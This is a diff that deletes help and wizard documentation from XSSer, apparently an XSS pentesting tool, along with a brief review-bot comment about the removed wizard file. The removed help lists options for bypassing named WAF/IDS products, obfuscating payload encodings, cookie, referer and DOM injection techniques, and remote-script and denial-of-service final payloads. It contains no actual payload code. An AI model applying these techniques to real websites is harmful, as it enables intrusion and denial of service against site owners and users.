-  *Anti-antiXSS Firewall rules*:
-    These options can be used to try to bypass specific WAF/IDS products.
-    Choose only if required:
-
-    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
-    --Phpids0.7         PHPIDS (0.7) [ALL]
-    --Imperva           Imperva Incapsula [ALL]
-    --Webknight         WebKnight (4.1) [Chrome]
-    --F5bigip           F5 Big IP [Chrome + FF + Opera]
-    --Barracuda         Barracuda WAF [ALL]
-    --Modsec            Mod-Security [ALL]
-    --Quickdefense      QuickDefense [Chrome]
-
-  *Select Bypasser(s)*:
-    These options can be used to encode vector(s) and try to bypass
-    possible anti-XSS filters. They can be combined with other techniques:
-
-    --Str               Use method String.FromCharCode()
-    --Une               Use Unescape() function
-    --Mix               Mix String.FromCharCode() and Unescape()
-    --Dec               Use Decimal encoding
-    --Hex               Use Hexadecimal encoding
-    --Hes               Use Hexadecimal encoding with semicolons
-    --Dwo               Encode IP addresses with DWORD
-    --Doo               Encode IP addresses with Octal
-    --Cem=CEM           Set different 'Character Encoding Mutations'
-                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
-
-  *Special Technique(s)*:
-    These options can be used to inject code using different XSS
-    techniques. You can choose multiple:
-
-    --Coo               COO - Cross Site Scripting Cookie injection
-    --Xsa               XSA - Cross Site Agent Scripting
-    --Xsr               XSR - Cross Site Referer Scripting
-    --Dcp               DCP - Data Control Protocol injections
-    --Dom               DOM - Document Object Model injections
-    --Ind               IND - HTTP Response Splitting Induced code
-    --Anchor            ANC - Use Anchor Stealth payloader (DOM shadows!)
-
-  *Select Final injection(s)*:
-    These options can be used to specify the final code to inject on
-    vulnerable target(s). Important if you want to exploit 'on-the-wild'
-    the vulnerabilities found. Choose only one option:
-
-    --Fp=FINALPAYLOAD   OWN    - Exploit your own code
-    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-
-    --Doss              DOSs   - XSS (server) Denial of Service
-    --Dos               DOS    - XSS (client) Denial of Service
-    --B64               B64    - Base64 code encoding in META tag (rfc2397)
-
-  *Special Final injection(s)*:
-    These options can be used to execute some 'special' injection(s) on
-    vulnerable target(s). You can select multiple and combine them with
-    your final code (except with DCP code):
-
-    --Onm               ONM - Use onMouseMove() event
-    --Ifr               IFR - Use <iframe> source tag
-
-  *Reporting*:
-    --save              export to file (XSSreport.raw)
-    --xml=FILEXML       export to XML (--xml file.xml)
-
-  *Miscellaneous*:
-    --silent            inhibit console output results
-    --no-head           NOT send a HEAD request before start a test
-    --alive=ISALIVE     set limit of errors before check if target is alive
-    --update            check for latest stable version
-

+ 0 - 16
xsser/gtk/docs/wizard0.txt

@@ -1,16 +0,0 @@
-         
-         
-          
-    ==========
-
-    Welcome to the Wizard Helper!
-
-
-    You only need to reply some questions to create your pentesting attack. If you haven't time to read, just press "Next". :-)
-
-    XSSer will take your answers to -automagically- build all the necessary commands.
-
-
-    Press "Start Wizard" button (below) to start your configuration...
-
-    ==========
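Review bot: the welcome page of the GTK wizard is deleted outright here (the hunk removes all 16 lines of `xsser/gtk/docs/wizard0.txt`), so any code that still opens this path to populate the first wizard screen will fail at runtime. Confirm the GTK controller's lookup for the wizard text has been updated in the same changeset, and consider whether the relocated copy of this file should be added with the three leading whitespace-only lines (lines 1-3 of the old file) stripped, since they carry no content.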